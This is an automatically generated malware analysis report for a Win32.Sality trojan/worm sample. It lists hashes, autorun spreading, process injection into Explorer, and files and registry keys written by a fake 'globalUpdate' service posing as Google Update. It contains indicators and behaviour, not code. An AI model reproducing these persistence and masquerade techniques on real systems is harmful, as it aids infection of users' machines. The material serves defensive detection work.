Win32.Sality.3_4349e06c6d

by malwarelabrobot on October 22nd, 2014 in Malware Descriptions.

Win32.Sality.3 (B) (Emsisoft), Win32.Sality.3 (AdAware), Trojan.Win32.Alureon.FD, Virus.Win32.Sality.FD, Virus.Win32.Sality.2.FD, VirusSality.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, Virus, WormAutorun


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 4349e06c6d8b7677af3099bc0ee5d727
SHA1: 15b8ebdfa17bcc42081ae6dacc15669d27dd0388
SHA256: e385622cb5ed5e8cae557e320849d0595c325db264c713fc5eafa70aaac1eb6c
SSDeep: 196608:foymYvquDTSnlxpf8FBXFf5ihM36YfYbYDGgbTfoe2:fo5YvtSnlXf8FZ4YDVbTq
Size: 8041352 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-12-04 15:55:02
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour: Description
WormAutorun: A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.


Process activity

The Trojan creates the following process(es):

GoogleUpdate.exe:2460
GoogleUpdate.exe:756
GoogleUpdate.exe:2652
GoogleUpdate.exe:2296
GoogleUpdate.exe:1288
GoogleUpdate.exe:2364
GoogleUpdate.exe:2356
772406a5-70fe-462f-841c-e18bdccbdc78-3.exe:1540
Iufkopcpdfjpcg.exe:424
MPlayerplus_01-bg.exe:2776
772406a5-70fe-462f-841c-e18bdccbdc78-4.exe:2112
%original file name%.exe:688
regsvr32.exe:2736
dwwin.exe:3088
MPlayerplus_01-codedownloader.exe:2344
MPlayerplus_01-codedownloader.exe:2224
772406a5-70fe-462f-841c-e18bdccbdc78-2.exe:2848

The Trojan injects its code into the following process(es):

3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe:852
Explorer.EXE:1684

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process GoogleUpdate.exe:2460 makes changes in the file system.
The Trojan deletes the following file(s):

%Program Files%\globalUpdate\Update\Install (0 bytes)

The process GoogleUpdate.exe:756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):


The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CabB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar8.tmp (0 bytes)

The process Iufkopcpdfjpcg.exe:424 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):


The Trojan deletes the following file(s):


The process %original file name%.exe:688 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\system.ini (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00157D19_Rar\%original file name%.exe (61184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp (265148 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\Zvbbyym.tmp (248938 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\Iufkopcpdfjpcg.exe (983586 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\WrapperUtils.dll (2392 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\Zvbbyym.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\Iufkopcpdfjpcg.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\WrapperUtils.dll (0 bytes)

The process MPlayerplus_01-codedownloader.exe:2344 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):


Registry activity

The process GoogleUpdate.exe:2460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 44 FC 46 17 38 E3 97 36 D2 61 4A A3 FA D2 C6"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{B13CB685-2858-4509-BB2E-34E3545B73F9}]
"pv" = "1.3.25.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F]
"BaseClass" = "Drive"

[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A]
"BaseClass" = "Drive"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"uid"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"

The process GoogleUpdate.exe:756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Description" = "globalUpdate Update"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\ProgID]
"(Default)" = "globalUpdate.OneClickCtrl.10"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"

[HKCR\globalUpdate.Update3WebControl.4\CLSID]
"(Default)" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"ProductName" = "globalUpdate Update"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"(Default)" = "globalUpdate Update Plugin"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"Name" = "globalUpdate Update"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Version" = "4"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"Policy" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Version" = "10"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\globalUpdate\Update]
"GoogleUpdate.exe" = "globalUpdate Update"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"ProductName" = "globalUpdate Update"

[HKCR\globalUpdate.Update3WebControl.4]
"(Default)" = "globalUpdate Update Plugin"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppName" = "GoogleUpdate.exe"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"vendor" = "globalUpdate"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"Policy" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\MIME\Database\Content Type\application/x-vnd.google.update3webcontrol.4]
"CLSID" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppName" = "GoogleUpdateBroker.exe"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Description" = "globalUpdate Update"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"InstallTime" = "1413862435"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe]
"DisableExceptionChainValidation" = "0"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"brand" = "GGLS"

[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"(Default)" = "globalUpdate Update Plugin"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"vendor" = "globalUpdate"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 92 F4 66 72 14 7F E1 AA B2 C8 FC 8E 30 19 46"

[HKCR\globalUpdate.OneClickCtrl.10\CLSID]
"(Default)" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"Path" = "%Program Files%\globalUpdate\Update\GoogleUpdate.exe"
"Version" = "1.3.25.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppPath" = "%Program Files%\globalUpdate\Update\1.3.25.0"

[HKCR\MIME\Database\Content Type\application/x-vnd.google.oneclickctrl.10]
"CLSID" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppPath" = "%Program Files%\globalUpdate\Update"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\ProgID]
"(Default)" = "globalUpdate.Update3WebControl.4"

[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
"ThreadingModel" = "Apartment"

[HKCR\globalUpdate.OneClickCtrl.10]
"(Default)" = "globalUpdate Update Plugin"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update]
"mi"
"eulaaccepted"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"LastChecked"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableSince"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"ui"
"uid"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableCount"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"

The process GoogleUpdate.exe:2652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 5F DE 54 9B E3 20 26 3E 7B 60 E6 D1 93 0B C1"

[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

The process GoogleUpdate.exe:2296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}]
"(Default)" = "CoCreateAsync"

[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"

[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}]
"(Default)" = "IApp"

[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}]
"(Default)" = "IJobObserver"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\globalUpdateUpdate.CoCreateAsync.1.0]
"(Default)" = "CoCreateAsync"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"Enabled" = "1"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}]
"(Default)" = "IGoogleUpdate3Web"

[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}]
"(Default)" = "ICredentialDialog"

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\globalUpdateUpdate.Update3WebMachine\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\NumMethods]
"(Default)" = "13"

[HKCR\globalUpdateUpdate.CredentialDialogMachine\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\ProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"

[HKCR\globalUpdateUpdate.Update3WebMachine.1.0\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"

[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\NumMethods]
"(Default)" = "40"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.Update3WebMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}]
"(Default)" = "ICoCreateAsyncStatus"

[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}]
"(Default)" = "IProcessLauncher"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\globalUpdateUpdate.CoreMachineClass]
"(Default)" = "Google Update Core Class"

[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\NumMethods]
"(Default)" = "24"

[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\NumMethods]
"(Default)" = "4"

[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"ThreadingModel" = "Both"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\NumMethods]
"(Default)" = "9"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"

[HKCR\globalUpdateUpdate.ProcessLauncher\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"Policy" = "3"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"ThreadingModel" = "Both"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}]
"(Default)" = "GoogleUpdate CredentialDialog"

[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\NumMethods]
"(Default)" = "4"

[HKCR\globalUpdateUpdate.ProcessLauncher]
"(Default)" = "Google Update Process Launcher Class"

[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\NumMethods]
"(Default)" = "10"

[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"

[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}]
"(Default)" = "IRegistrationUpdateHook"

[HKCR\globalUpdateUpdate.CoreMachineClass\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"

[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\NumMethods]
"(Default)" = "10"

[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}]
"(Default)" = "IGoogleUpdate3WebSecurity"

[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}]
"(Default)" = "IGoogleUpdateCore"

[HKCR\globalUpdateUpdate.ProcessLauncher.1.0]
"(Default)" = "Google Update Process Launcher Class"

[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\NumMethods]
"(Default)" = "4"

[HKCR\globalUpdateUpdate.CoCreateAsync\CurVer]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"

[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\NumMethods]
"(Default)" = "10"

[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}]
"(Default)" = "IAppVersionWeb"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdate.OneClickProcessLauncherMachine]
"(Default)" = "globalUpdate.OneClickProcessLauncher"

[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\NumMethods]
"(Default)" = "24"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 48 80 90 16 B1 9E B5 7A 8B FF 4E 4F 2C 34 3E"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachine"

[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}]
"(Default)" = "IGoogleUpdate3"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\ProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"

[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"ThreadingModel" = "Both"

[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"

[HKCR\globalUpdateUpdate.CredentialDialogMachine\CurVer]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"

[HKCR\globalUpdate.OneClickProcessLauncherMachine\CurVer]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine"

[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\NumMethods]
"(Default)" = "8"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass"

[HKCR\globalUpdateUpdate.CoreMachineClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine"

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\ProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"

[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"

[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\NumMethods]
"(Default)" = "8"

[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"

[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}]
"(Default)" = "ICurrentState"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"

[HKCR\globalUpdateUpdate.ProcessLauncher.1.0\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"

[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback"

